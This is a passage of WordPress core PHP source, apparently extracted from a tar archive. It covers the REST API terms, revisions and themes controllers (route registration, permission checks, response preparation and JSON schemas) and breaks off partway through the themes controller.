public function prepare_item_for_database( $request ) {
$prepared_term = new stdClass;
$schema = $this->get_item_schema();
if ( isset( $request['name'] ) && ! empty( $schema['properties']['name'] ) ) {
$prepared_term->name = $request['name'];
}
if ( isset( $request['slug'] ) && ! empty( $schema['properties']['slug'] ) ) {
$prepared_term->slug = $request['slug'];
}
if ( isset( $request['taxonomy'] ) && ! empty( $schema['properties']['taxonomy'] ) ) {
$prepared_term->taxonomy = $request['taxonomy'];
}
if ( isset( $request['description'] ) && ! empty( $schema['properties']['description'] ) ) {
$prepared_term->description = $request['description'];
}
if ( isset( $request['parent'] ) && ! empty( $schema['properties']['parent'] ) ) {
$parent_term_id = 0;
$parent_term = get_term( (int) $request['parent'], $this->taxonomy );
if ( $parent_term ) {
$parent_term_id = $parent_term->term_id;
}
$prepared_term->parent = $parent_term_id;
}
/**
* Filters term data before inserting term via the REST API.
*
* The dynamic portion of the hook name, `$this->taxonomy`, refers to the taxonomy slug.
*
* @since 4.7.0
*
* @param object $prepared_term Term object.
* @param WP_REST_Request $request Request object.
*/
return apply_filters( "rest_pre_insert_{$this->taxonomy}", $prepared_term, $request );
}
/**
* Prepares a single term output for response.
*
* @since 4.7.0
*
* @param obj $item Term object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response $response Response object.
*/
public function prepare_item_for_response( $item, $request ) {
$fields = $this->get_fields_for_response( $request );
$data = array();
if ( in_array( 'id', $fields, true ) ) {
$data['id'] = (int) $item->term_id;
}
if ( in_array( 'count', $fields, true ) ) {
$data['count'] = (int) $item->count;
}
if ( in_array( 'description', $fields, true ) ) {
$data['description'] = $item->description;
}
if ( in_array( 'link', $fields, true ) ) {
$data['link'] = get_term_link( $item );
}
if ( in_array( 'name', $fields, true ) ) {
$data['name'] = $item->name;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $item->slug;
}
if ( in_array( 'taxonomy', $fields, true ) ) {
$data['taxonomy'] = $item->taxonomy;
}
if ( in_array( 'parent', $fields, true ) ) {
$data['parent'] = (int) $item->parent;
}
if ( in_array( 'meta', $fields, true ) ) {
$data['meta'] = $this->meta->get_value( $item->term_id, $request );
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
$response = rest_ensure_response( $data );
$response->add_links( $this->prepare_links( $item ) );
/**
* Filters a term item returned from the API.
*
* The dynamic portion of the hook name, `$this->taxonomy`, refers to the taxonomy slug.
*
* Allows modification of the term data right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param object $item The original term object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( "rest_prepare_{$this->taxonomy}", $response, $item, $request );
}
/**
* Prepares links for the request.
*
* @since 4.7.0
*
* @param object $term Term object.
* @return array Links for the given term.
*/
protected function prepare_links( $term ) {
$base = $this->namespace . '/' . $this->rest_base;
$links = array(
'self' => array(
'href' => rest_url( trailingslashit( $base ) . $term->term_id ),
),
'collection' => array(
'href' => rest_url( $base ),
),
'about' => array(
'href' => rest_url( sprintf( 'wp/v2/taxonomies/%s', $this->taxonomy ) ),
),
);
if ( $term->parent ) {
$parent_term = get_term( (int) $term->parent, $term->taxonomy );
if ( $parent_term ) {
$links['up'] = array(
'href' => rest_url( trailingslashit( $base ) . $parent_term->term_id ),
'embeddable' => true,
);
}
}
$taxonomy_obj = get_taxonomy( $term->taxonomy );
if ( empty( $taxonomy_obj->object_type ) ) {
return $links;
}
$post_type_links = array();
foreach ( $taxonomy_obj->object_type as $type ) {
$post_type_object = get_post_type_object( $type );
if ( empty( $post_type_object->show_in_rest ) ) {
continue;
}
$rest_base = ! empty( $post_type_object->rest_base ) ? $post_type_object->rest_base : $post_type_object->name;
$post_type_links[] = array(
'href' => add_query_arg( $this->rest_base, $term->term_id, rest_url( sprintf( 'wp/v2/%s', $rest_base ) ) ),
);
}
if ( ! empty( $post_type_links ) ) {
$links['https://api.w.org/post_type'] = $post_type_links;
}
return $links;
}
/**
* Retrieves the term's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'post_tag' === $this->taxonomy ? 'tag' : $this->taxonomy,
'type' => 'object',
'properties' => array(
'id' => array(
'description' => __( 'Unique identifier for the term.' ),
'type' => 'integer',
'context' => array( 'view', 'embed', 'edit' ),
'readonly' => true,
),
'count' => array(
'description' => __( 'Number of published posts for the term.' ),
'type' => 'integer',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'description' => array(
'description' => __( 'HTML description of the term.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
),
'link' => array(
'description' => __( 'URL of the term.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'view', 'embed', 'edit' ),
'readonly' => true,
),
'name' => array(
'description' => __( 'HTML title for the term.' ),
'type' => 'string',
'context' => array( 'view', 'embed', 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
'required' => true,
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the term unique to its type.' ),
'type' => 'string',
'context' => array( 'view', 'embed', 'edit' ),
'arg_options' => array(
'sanitize_callback' => array( $this, 'sanitize_slug' ),
),
),
'taxonomy' => array(
'description' => __( 'Type attribution for the term.' ),
'type' => 'string',
'enum' => array_keys( get_taxonomies() ),
'context' => array( 'view', 'embed', 'edit' ),
'readonly' => true,
),
),
);
$taxonomy = get_taxonomy( $this->taxonomy );
if ( $taxonomy->hierarchical ) {
$schema['properties']['parent'] = array(
'description' => __( 'The parent term ID.' ),
'type' => 'integer',
'context' => array( 'view', 'edit' ),
);
}
$schema['properties']['meta'] = $this->meta->get_field_schema();
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$query_params = parent::get_collection_params();
$taxonomy = get_taxonomy( $this->taxonomy );
$query_params['context']['default'] = 'view';
$query_params['exclude'] = array(
'description' => __( 'Ensure result set excludes specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['include'] = array(
'description' => __( 'Limit result set to specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
if ( ! $taxonomy->hierarchical ) {
$query_params['offset'] = array(
'description' => __( 'Offset the result set by a specific number of items.' ),
'type' => 'integer',
);
}
$query_params['order'] = array(
'description' => __( 'Order sort attribute ascending or descending.' ),
'type' => 'string',
'default' => 'asc',
'enum' => array(
'asc',
'desc',
),
);
$query_params['orderby'] = array(
'description' => __( 'Sort collection by term attribute.' ),
'type' => 'string',
'default' => 'name',
'enum' => array(
'id',
'include',
'name',
'slug',
'include_slugs',
'term_group',
'description',
'count',
),
);
$query_params['hide_empty'] = array(
'description' => __( 'Whether to hide terms not assigned to any posts.' ),
'type' => 'boolean',
'default' => false,
);
if ( $taxonomy->hierarchical ) {
$query_params['parent'] = array(
'description' => __( 'Limit result set to terms assigned to a specific parent.' ),
'type' => 'integer',
);
}
$query_params['post'] = array(
'description' => __( 'Limit result set to terms assigned to a specific post.' ),
'type' => 'integer',
'default' => null,
);
$query_params['slug'] = array(
'description' => __( 'Limit result set to terms with one or more specific slugs.' ),
'type' => 'array',
'items' => array(
'type' => 'string'
),
);
/**
* Filter collection parameters for the terms controller.
*
* The dynamic part of the filter `$this->taxonomy` refers to the taxonomy
* slug for the controller.
*
* This filter registers the collection parameter, but does not map the
* collection parameter to an internal WP_Term_Query parameter. Use the
* `rest_{$this->taxonomy}_query` filter to set WP_Term_Query parameters.
*
* @since 4.7.0
*
* @param array $query_params JSON Schema-formatted collection parameters.
* @param WP_Taxonomy $taxonomy Taxonomy object.
*/
return apply_filters( "rest_{$this->taxonomy}_collection_params", $query_params, $taxonomy );
}
/**
* Checks that the taxonomy is valid.
*
* @since 4.7.0
*
* @param string $taxonomy Taxonomy to check.
* @return bool Whether the taxonomy is allowed for REST management.
*/
protected function check_is_taxonomy_allowed( $taxonomy ) {
$taxonomy_obj = get_taxonomy( $taxonomy );
if ( $taxonomy_obj && ! empty( $taxonomy_obj->show_in_rest ) ) {
return true;
}
return false;
}
}
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-revisions-controller.php����������������������������������������������������0000666�����������������00000056010�15111427772�0016201 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Revisions_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to access revisions via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Revisions_Controller extends WP_REST_Controller {
/**
* Parent post type.
*
* @since 4.7.0
* @var string
*/
private $parent_post_type;
/**
* Parent controller.
*
* @since 4.7.0
* @var WP_REST_Controller
*/
private $parent_controller;
/**
* The base of the parent controller's route.
*
* @since 4.7.0
* @var string
*/
private $parent_base;
/**
* Constructor.
*
* @since 4.7.0
*
* @param string $parent_post_type Post type of the parent.
*/
public function __construct( $parent_post_type ) {
$this->parent_post_type = $parent_post_type;
$this->parent_controller = new WP_REST_Posts_Controller( $parent_post_type );
$this->namespace = 'wp/v2';
$this->rest_base = 'revisions';
$post_type_object = get_post_type_object( $parent_post_type );
$this->parent_base = ! empty( $post_type_object->rest_base ) ? $post_type_object->rest_base : $post_type_object->name;
}
/**
* Registers routes for revisions based on post types supporting revisions.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->parent_base . '/(?P<parent>[\d]+)/' . $this->rest_base, array(
'args' => array(
'parent' => array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->parent_base . '/(?P<parent>[\d]+)/' . $this->rest_base . '/(?P<id>[\d]+)', array(
'args' => array(
'parent' => array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
),
'id' => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
array(
'methods' => WP_REST_Server::DELETABLE,
'callback' => array( $this, 'delete_item' ),
'permission_callback' => array( $this, 'delete_item_permissions_check' ),
'args' => array(
'force' => array(
'type' => 'boolean',
'default' => false,
'description' => __( 'Required to be true, as revisions do not support trashing.' ),
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
));
}
/**
* Get the parent post, if the ID is valid.
*
* @since 4.7.2
*
* @param int $id Supplied ID.
* @return WP_Post|WP_Error Post object if ID is valid, WP_Error otherwise.
*/
protected function get_parent( $parent ) {
$error = new WP_Error( 'rest_post_invalid_parent', __( 'Invalid post parent ID.' ), array( 'status' => 404 ) );
if ( (int) $parent <= 0 ) {
return $error;
}
$parent = get_post( (int) $parent );
if ( empty( $parent ) || empty( $parent->ID ) || $this->parent_post_type !== $parent->post_type ) {
return $error;
}
return $parent;
}
/**
* Checks if a given request has access to get revisions.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return true|WP_Error True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
$parent = $this->get_parent( $request['parent'] );
if ( is_wp_error( $parent ) ) {
return $parent;
}
$parent_post_type_obj = get_post_type_object( $parent->post_type );
if ( ! current_user_can( $parent_post_type_obj->cap->edit_post, $parent->ID ) ) {
return new WP_Error( 'rest_cannot_read', __( 'Sorry, you are not allowed to view revisions of this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Get the revision, if the ID is valid.
*
* @since 4.7.2
*
* @param int $id Supplied ID.
* @return WP_Post|WP_Error Revision post object if ID is valid, WP_Error otherwise.
*/
protected function get_revision( $id ) {
$error = new WP_Error( 'rest_post_invalid_id', __( 'Invalid revision ID.' ), array( 'status' => 404 ) );
if ( (int) $id <= 0 ) {
return $error;
}
$revision = get_post( (int) $id );
if ( empty( $revision ) || empty( $revision->ID ) || 'revision' !== $revision->post_type ) {
return $error;
}
return $revision;
}
/**
* Gets a collection of revisions.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
$parent = $this->get_parent( $request['parent'] );
if ( is_wp_error( $parent ) ) {
return $parent;
}
// Ensure a search string is set in case the orderby is set to 'relevance'.
if ( ! empty( $request['orderby'] ) && 'relevance' === $request['orderby'] && empty( $request['search'] ) ) {
return new WP_Error( 'rest_no_search_term_defined', __( 'You need to define a search term to order by relevance.' ), array( 'status' => 400 ) );
}
// Ensure an include parameter is set in case the orderby is set to 'include'.
if ( ! empty( $request['orderby'] ) && 'include' === $request['orderby'] && empty( $request['include'] ) ) {
return new WP_Error( 'rest_orderby_include_missing_include', __( 'You need to define an include parameter to order by include.' ), array( 'status' => 400 ) );
}
if ( wp_revisions_enabled( $parent ) ) {
$registered = $this->get_collection_params();
$args = array(
'post_parent' => $parent->ID,
'post_type' => 'revision',
'post_status' => 'inherit',
'posts_per_page' => -1,
'orderby' => 'date ID',
'order' => 'DESC',
'suppress_filters' => true,
);
$parameter_mappings = array(
'exclude' => 'post__not_in',
'include' => 'post__in',
'offset' => 'offset',
'order' => 'order',
'orderby' => 'orderby',
'page' => 'paged',
'per_page' => 'posts_per_page',
'search' => 's',
);
foreach ( $parameter_mappings as $api_param => $wp_param ) {
if ( isset( $registered[ $api_param ], $request[ $api_param ] ) ) {
$args[ $wp_param ] = $request[ $api_param ];
}
}
// For backward-compatibility, 'date' needs to resolve to 'date ID'.
if ( isset( $args['orderby'] ) && 'date' === $args['orderby'] ) {
$args['orderby'] = 'date ID';
}
/** This filter is documented in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php */
$args = apply_filters( 'rest_revision_query', $args, $request );
$query_args = $this->prepare_items_query( $args, $request );
$revisions_query = new WP_Query();
$revisions = $revisions_query->query( $query_args );
$offset = isset( $query_args['offset'] ) ? (int) $query_args['offset'] : 0;
$page = (int) $query_args['paged'];
$total_revisions = $revisions_query->found_posts;
if ( $total_revisions < 1 ) {
// Out-of-bounds, run the query again without LIMIT for total count.
unset( $query_args['paged'], $query_args['offset'] );
$count_query = new WP_Query();
$count_query->query( $query_args );
$total_revisions = $count_query->found_posts;
}
if ( $revisions_query->query_vars['posts_per_page'] > 0 ) {
$max_pages = ceil( $total_revisions / (int) $revisions_query->query_vars['posts_per_page'] );
} else {
$max_pages = $total_revisions > 0 ? 1 : 0;
}
if ( $total_revisions > 0 ) {
if ( $offset >= $total_revisions ) {
return new WP_Error( 'rest_revision_invalid_offset_number', __( 'The offset number requested is larger than or equal to the number of available revisions.' ), array( 'status' => 400 ) );
} elseif ( ! $offset && $page > $max_pages ) {
return new WP_Error( 'rest_revision_invalid_page_number', __( 'The page number requested is larger than the number of pages available.' ), array( 'status' => 400 ) );
}
}
} else {
$revisions = array();
$total_revisions = 0;
$max_pages = 0;
$page = (int) $request['page'];
}
$response = array();
foreach ( $revisions as $revision ) {
$data = $this->prepare_item_for_response( $revision, $request );
$response[] = $this->prepare_response_for_collection( $data );
}
$response = rest_ensure_response( $response );
$response->header( 'X-WP-Total', (int) $total_revisions );
$response->header( 'X-WP-TotalPages', (int) $max_pages );
$request_params = $request->get_query_params();
$base = add_query_arg( $request_params, rest_url( sprintf( '%s/%s/%d/%s', $this->namespace, $this->parent_base, $request['parent'], $this->rest_base ) ) );
if ( $page > 1 ) {
$prev_page = $page - 1;
if ( $prev_page > $max_pages ) {
$prev_page = $max_pages;
}
$prev_link = add_query_arg( 'page', $prev_page, $base );
$response->link_header( 'prev', $prev_link );
}
if ( $max_pages > $page ) {
$next_page = $page + 1;
$next_link = add_query_arg( 'page', $next_page, $base );
$response->link_header( 'next', $next_link );
}
return $response;
}
/**
* Checks if a given request has access to get a specific revision.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return bool|WP_Error True if the request has read access for the item, WP_Error object otherwise.
*/
public function get_item_permissions_check( $request ) {
return $this->get_items_permissions_check( $request );
}
/**
* Retrieves one revision from the collection.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$parent = $this->get_parent( $request['parent'] );
if ( is_wp_error( $parent ) ) {
return $parent;
}
$revision = $this->get_revision( $request['id'] );
if ( is_wp_error( $revision ) ) {
return $revision;
}
$response = $this->prepare_item_for_response( $revision, $request );
return rest_ensure_response( $response );
}
/**
* Checks if a given request has access to delete a revision.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has access to delete the item, WP_Error object otherwise.
*/
public function delete_item_permissions_check( $request ) {
$parent = $this->get_parent( $request['parent'] );
if ( is_wp_error( $parent ) ) {
return $parent;
}
$revision = $this->get_revision( $request['id'] );
if ( is_wp_error( $revision ) ) {
return $revision;
}
$response = $this->get_items_permissions_check( $request );
if ( ! $response || is_wp_error( $response ) ) {
return $response;
}
$post_type = get_post_type_object( 'revision' );
return current_user_can( $post_type->cap->delete_post, $revision->ID );
}
/**
* Deletes a single revision.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True on success, or WP_Error object on failure.
*/
public function delete_item( $request ) {
$revision = $this->get_revision( $request['id'] );
if ( is_wp_error( $revision ) ) {
return $revision;
}
$force = isset( $request['force'] ) ? (bool) $request['force'] : false;
// We don't support trashing for revisions.
if ( ! $force ) {
/* translators: %s: force=true */
return new WP_Error( 'rest_trash_not_supported', sprintf( __( "Revisions do not support trashing. Set '%s' to delete." ), 'force=true' ), array( 'status' => 501 ) );
}
$previous = $this->prepare_item_for_response( $revision, $request );
$result = wp_delete_post( $request['id'], true );
/**
* Fires after a revision is deleted via the REST API.
*
* @since 4.7.0
*
* @param (mixed) $result The revision object (if it was deleted or moved to the trash successfully)
* or false (failure). If the revision was moved to the trash, $result represents
* its new state; if it was deleted, $result represents its state before deletion.
* @param WP_REST_Request $request The request sent to the API.
*/
do_action( 'rest_delete_revision', $result, $request );
if ( ! $result ) {
return new WP_Error( 'rest_cannot_delete', __( 'The post cannot be deleted.' ), array( 'status' => 500 ) );
}
$response = new WP_REST_Response();
$response->set_data( array( 'deleted' => true, 'previous' => $previous->get_data() ) );
return $response;
}
/**
* Determines the allowed query_vars for a get_items() response and prepares
* them for WP_Query.
*
* @since 5.0.0
*
* @param array $prepared_args Optional. Prepared WP_Query arguments. Default empty array.
* @param WP_REST_Request $request Optional. Full details about the request.
* @return array Items query arguments.
*/
protected function prepare_items_query( $prepared_args = array(), $request = null ) {
$query_args = array();
foreach ( $prepared_args as $key => $value ) {
/** This filter is documented in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php */
$query_args[ $key ] = apply_filters( "rest_query_var-{$key}", $value ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
}
// Map to proper WP_Query orderby param.
if ( isset( $query_args['orderby'] ) && isset( $request['orderby'] ) ) {
$orderby_mappings = array(
'id' => 'ID',
'include' => 'post__in',
'slug' => 'post_name',
'include_slugs' => 'post_name__in',
);
if ( isset( $orderby_mappings[ $request['orderby'] ] ) ) {
$query_args['orderby'] = $orderby_mappings[ $request['orderby'] ];
}
}
return $query_args;
}
/**
* Prepares the revision for the REST response.
*
* @since 4.7.0
*
* @param WP_Post $post Post revision object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $post, $request ) {
$GLOBALS['post'] = $post;
setup_postdata( $post );
$fields = $this->get_fields_for_response( $request );
$data = array();
if ( in_array( 'author', $fields, true ) ) {
$data['author'] = (int) $post->post_author;
}
if ( in_array( 'date', $fields, true ) ) {
$data['date'] = $this->prepare_date_response( $post->post_date_gmt, $post->post_date );
}
if ( in_array( 'date_gmt', $fields, true ) ) {
$data['date_gmt'] = $this->prepare_date_response( $post->post_date_gmt );
}
if ( in_array( 'id', $fields, true ) ) {
$data['id'] = $post->ID;
}
if ( in_array( 'modified', $fields, true ) ) {
$data['modified'] = $this->prepare_date_response( $post->post_modified_gmt, $post->post_modified );
}
if ( in_array( 'modified_gmt', $fields, true ) ) {
$data['modified_gmt'] = $this->prepare_date_response( $post->post_modified_gmt );
}
if ( in_array( 'parent', $fields, true ) ) {
$data['parent'] = (int) $post->post_parent;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $post->post_name;
}
if ( in_array( 'guid', $fields, true ) ) {
$data['guid'] = array(
/** This filter is documented in wp-includes/post-template.php */
'rendered' => apply_filters( 'get_the_guid', $post->guid, $post->ID ),
'raw' => $post->guid,
);
}
if ( in_array( 'title', $fields, true ) ) {
$data['title'] = array(
'raw' => $post->post_title,
'rendered' => get_the_title( $post->ID ),
);
}
if ( in_array( 'content', $fields, true ) ) {
$data['content'] = array(
'raw' => $post->post_content,
/** This filter is documented in wp-includes/post-template.php */
'rendered' => apply_filters( 'the_content', $post->post_content ),
);
}
if ( in_array( 'excerpt', $fields, true ) ) {
$data['excerpt'] = array(
'raw' => $post->post_excerpt,
'rendered' => $this->prepare_excerpt_response( $post->post_excerpt, $post ),
);
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
$response = rest_ensure_response( $data );
if ( ! empty( $data['parent'] ) ) {
$response->add_link( 'parent', rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->parent_base, $data['parent'] ) ) );
}
/**
* Filters a revision returned from the API.
*
* Allows modification of the revision right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param WP_Post $post The original revision object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_revision', $response, $post, $request );
}
/**
* Checks the post_date_gmt or modified_gmt and prepare any post or
* modified date for single post output.
*
* @since 4.7.0
*
* @param string $date_gmt GMT publication time.
* @param string|null $date Optional. Local publication time. Default null.
* @return string|null ISO8601/RFC3339 formatted datetime, otherwise null.
*/
protected function prepare_date_response( $date_gmt, $date = null ) {
if ( '0000-00-00 00:00:00' === $date_gmt ) {
return null;
}
if ( isset( $date ) ) {
return mysql_to_rfc3339( $date );
}
return mysql_to_rfc3339( $date_gmt );
}
/**
* Retrieves the revision's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => "{$this->parent_post_type}-revision",
'type' => 'object',
// Base properties for every Revision.
'properties' => array(
'author' => array(
'description' => __( 'The ID for the author of the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
),
'date' => array(
'description' => __( "The date the object was published, in the site's timezone." ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit', 'embed' ),
),
'date_gmt' => array(
'description' => __( 'The date the object was published, as GMT.' ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
),
'guid' => array(
'description' => __( 'GUID for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
),
'id' => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
),
'modified' => array(
'description' => __( "The date the object was last modified, in the site's timezone." ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
),
'modified_gmt' => array(
'description' => __( 'The date the object was last modified, as GMT.' ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
),
'parent' => array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the object unique to its type.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
),
),
);
$parent_schema = $this->parent_controller->get_item_schema();
if ( ! empty( $parent_schema['properties']['title'] ) ) {
$schema['properties']['title'] = $parent_schema['properties']['title'];
}
if ( ! empty( $parent_schema['properties']['content'] ) ) {
$schema['properties']['content'] = $parent_schema['properties']['content'];
}
if ( ! empty( $parent_schema['properties']['excerpt'] ) ) {
$schema['properties']['excerpt'] = $parent_schema['properties']['excerpt'];
}
if ( ! empty( $parent_schema['properties']['guid'] ) ) {
$schema['properties']['guid'] = $parent_schema['properties']['guid'];
}
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$query_params = parent::get_collection_params();
$query_params['context']['default'] = 'view';
unset( $query_params['per_page']['default'] );
$query_params['exclude'] = array(
'description' => __( 'Ensure result set excludes specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['include'] = array(
'description' => __( 'Limit result set to specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['offset'] = array(
'description' => __( 'Offset the result set by a specific number of items.' ),
'type' => 'integer',
);
$query_params['order'] = array(
'description' => __( 'Order sort attribute ascending or descending.' ),
'type' => 'string',
'default' => 'desc',
'enum' => array( 'asc', 'desc' ),
);
$query_params['orderby'] = array(
'description' => __( 'Sort collection by object attribute.' ),
'type' => 'string',
'default' => 'date',
'enum' => array(
'date',
'id',
'include',
'relevance',
'slug',
'include_slugs',
'title',
),
);
return $query_params;
}
/**
* Checks the post excerpt and prepare it for single post output.
*
* @since 4.7.0
*
* @param string $excerpt The post excerpt.
* @param WP_Post $post Post revision object.
* @return string Prepared excerpt or empty string.
*/
protected function prepare_excerpt_response( $excerpt, $post ) {
/** This filter is documented in wp-includes/post-template.php */
$excerpt = apply_filters( 'the_excerpt', $excerpt, $post );
if ( empty( $excerpt ) ) {
return '';
}
return $excerpt;
}
}
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-themes-controller.php�������������������������������������������������������0000666�����������������00000015572�15111427772�0015455 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Themes_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Core class used to manage themes via the REST API.
*
* @since 5.0.0
*
* @see WP_REST_Controller
*/
class WP_REST_Themes_Controller extends WP_REST_Controller {
/**
* Constructor.
*
* @since 5.0.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'themes';
}
/**
* Registers the routes for the objects of the controller.
*
* @since 5.0.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route(
$this->namespace,
'/' . $this->rest_base,
array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
'schema' => array( $this, 'get_item_schema' ),
)
);
}
/**
* Checks if a given request has access to read the theme.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has read access for the item, otherwise WP_Error object.
*/
public function get_items_permissions_check( $request ) {
if ( ! is_user_logged_in() || ! current_user_can( 'edit_posts' ) ) {
return new WP_Error( 'rest_user_cannot_view', __( 'Sorry, you are not allowed to view themes.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Retrieves a collection of themes.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
// Retrieve the list of registered collection query parameters.
$registered = $this->get_collection_params();
$themes = array();
if ( isset( $registered['status'], $request['status'] ) && in_array( 'active', $request['status'], true ) ) {
$active_theme = wp_get_theme();
$active_theme = $this->prepare_item_for_response( $active_theme, $request );
$themes[] = $this->prepare_response_for_collection( $active_theme );
}
$response = rest_ensure_response( $themes );
$response->header( 'X-WP-Total', count( $themes ) );
$response->header( 'X-WP-TotalPages', count( $themes ) );
return $response;
}
/**
* Prepares a single theme output for response.
*
* @since 5.0.0
*
* @param WP_Theme $theme Theme object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $theme, $request ) {
$data = array();
$fields = $this->get_fields_for_response( $request );
if ( in_array( 'theme_supports', $fields, true ) ) {
$formats = get_theme_support( 'post-formats' );
$formats = is_array( $formats ) ? array_values( $formats[0] ) : array();
$formats = array_merge( array( 'standard' ), $formats );
$data['theme_supports']['formats'] = $formats;
$data['theme_supports']['post-thumbnails'] = false;
$data['theme_supports']['responsive-embeds'] = (bool) get_theme_support( 'responsive-embeds' );
$post_thumbnails = get_theme_support( 'post-thumbnails' );
if ( $post_thumbnails ) {
// $post_thumbnails can contain a nested array of post types.
// e.g. array( array( 'post', 'page' ) ).
